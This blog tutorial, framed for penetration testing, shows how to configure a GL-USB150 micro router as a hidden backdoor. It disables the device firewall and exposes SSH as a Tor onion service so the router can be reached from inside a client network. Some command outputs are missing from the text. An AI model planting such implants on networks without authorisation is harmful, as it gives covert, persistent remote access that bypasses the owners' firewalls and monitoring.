By Mason Jeffers Taylor
This is a follow up to the previous article: “Weaponizing a micro router for penetration testing.”
This is how we deploy the GL.INET GL-USB150 in penetration tests to maintain a backdoor into a network.
I’m sure there are many other useful roles this can fill, such as home monitoring. I can’t wait to see what everyone else comes up with.
By setting this microrouter to be accessible via the Tor Network you can access it remotely, usually even if the router is deployed behind a firewall or cable modem.
Open the new dirt cheap GL-USB150 and plug it into your computer.
Wait 60 seconds for it to boot.
Go to http://192.168.8.1
Follow the instructions. Keep in mind that you want to set it to connect to the WiFi access point you will be using in the field. I use my phone’s tethering hotspot or the WiFi in my client’s building.
Let’s set up the ability to log in to this device via SSH without typing a password. To do that enter these commands into your Linux computer:
scp ~/.ssh/id_rsa.pub firstname.lastname@example.org:/etc/dropbear/authorized_keys
You should be greeted with a new OpenWrt ash shell with this prompt
Allow ssh from anywhere quick and dirty style: (feel free to tell me a better way to do this in the comments below.)
service firewall disable
service firewall stop
Make sure we’re online.
If you get an error, then your not online. If your not online go to http://192.168.8.1 and make it join a WiFI network.
opkg install tor
Next let’s get the tor config file set up:
echo "Log notice syslog
HiddenServicePort 22 127.0.0.1:22
User tor" > /etc/tor/torrc
Let’s setup the tor data directory.
chown -R tor /etc/tor
chmod 700 /etc/tor/other_hidden_service*
chown tor /etc/tor*
service tor enable
service tor start
Check to make sure our .onion hostname is stable:
You should see something like this:
This is your new secret .onion address. Save this for later
It should be the same. If it’s the same now we know that it should be the same when deployed. OpenWRT has an issue in which it can change every reboot. But keeping the files in /etc should fix this.
Now to make our Linux desktop able to login remotely through tor via ssh. First Install tor and torify with this command:
sudo apt -y install tor
I haven’t figured out why, but it takes our microrouter at least 10 minutes for this service to be reachable through tor.
If it’s been plugged in for awhile give this command a shot:
torify ssh email@example.com
Note: Replace “ad62y2ofdrre3rzq.onion” with your .onion address. To find this enter this:
Now think of the possibilities of being able to deploy this $22 Linux device (from Amazon) anywhere that it can reach the Internet via WiFi and then being able to reach it, even through firewalls, cable modems and NAT routers. What could you do with this?